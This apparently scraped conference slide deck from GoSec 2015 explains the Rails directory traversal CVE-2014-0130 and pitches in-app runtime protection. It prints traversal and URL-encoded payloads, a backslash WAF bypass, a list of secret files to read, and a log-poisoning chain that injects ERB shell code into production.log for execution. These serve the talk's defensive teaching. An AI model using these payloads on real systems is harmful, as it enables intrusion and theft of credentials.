Embed Size (px)
Citation preview
Protecting the Web From Within
Mike Milner CTO @immunio
GoSec 2015
TodayChecked in to my flight
Read the News
Paid for Parking
Coffee with the Starbucks app
Boarding Pass Slack
Gmail
Review some Pull Requests Uber
GoSec Schedule
Trello
Banking
Ashley Madison
TOP SECRET Security Clearance
with the OPM
All Online
All Online
Who is protecting my data?
How?
Framework up to Date?Libraries Patched?
Code Reviewed for Security?
Monitoring for New CVEs?
Reviewed External libraries?Static Analysis?
Fixed Insecure Defaults?
Security is Hard
But it can be SOOO
Interesting :)
CVE-2014-0130
“Directory traversal vulnerability”
Credited to Ville Lautanala of Flowdock
expanded on by Jeff Jarmoc @ Matasano
http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdfhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0130
Directory TraversalVulnerable Route with globbing:
get 'my_url/*action', controller: ‘asdf’
*action should be a function name, or a file name
RAILS_ROOT/app/views/<controller_name>/
What if I try: my_url/../../../Gemfile
Directory Traversal• /etc/passwd
• RAILS_ROOT/config/secrets.yml
• RAILS_ROOT/config/initializers/secret_token.rb
• SSL certificates
• /proc/self/environ
• /proc/<pid>/environ
Yikes!
Directory TraversalRecommendation - use non-globbing route:
get ‘my_url/:action', controller: ‘asdf’
Something like ../../../Gemfile won’t match
BUT!
Route matching happens BEFORE URI decoding:
my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile
Can We Execute Code?
“Helpful” default behaviour in Rails
Unknown extension defaults to ERB template
<%= `whoami` %>
Basics
Write code into file
Ask Rails to execute it
Getting Code into a FileRails does this for us!
/some/page?mycode=1234
Written to production.log
/some/page?mycode=%3c%25%3d%20%60%69%64%60%20%25%3e
<%= `whoami` %>
Putting it Together
/my_url/../../../production.log?mycode=<%= `whoami` %>
/my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2flog%2fproduction%2elog?
mycode=%3c%25%3d%20%60%69%64%60%20%25%3e
How to Defend?
Upgrade Rails - fixed in 4.1.1, 4.0.5, 3.2.18
Scan your code - Brakeman >= 2.5.1
Use recommended workarounds
Only helps AFTER the vulnerability is announced!
Active DefenceSignature Based
Hard to maintain, Easy to bypassWAF?
WAF?
Helpful bypass included in CVE!
Add ruby escape characters to traversal to hide:
\../\../\../Gemfile
Active DefenceWhat was the actual exploit?
A file was read that shouldn’t be read
Shell commands were executed
Move INSIDE the app and we can see these directly
Protect against the exploit
• Uploaded images should not be executed as code
• Don’t load configuration from /tmp
• My app does NOT need to read or write anywhere inside /etc
• In fact, the app shouldn’t be writing anywhere except /tmp and /var/log
• And especially not be reading from /etc/ssl or ~/.ssh/id_rsa
Track code that opens files
Protect against the exploit
• Most apps don’t need to execute shell commands. FENCE IT OFF!
• If you do need shell, track the code that runs commands.
• The command that minifies my CSS should not be downloading and executing a perl script!
• The command that sends an invoice should not be opening a reverse shell to Russia!
• And block shell access from everywhere else.
Track shell code execution
Inside the App
Much more accurate Fewer false positives.
• SQL Queries for SQL Injection
• Template rendering for Cross Site Scripting
• Authentication attacks and Brute Forcing
• Cross Site Request Forgery
Real-time web application security Automatic detection and protection against
app security vulnerabilities
Java Python Ruby
2 Minute Install
Thank You!
Mike Milner CTO @immunio
GoSec 2015
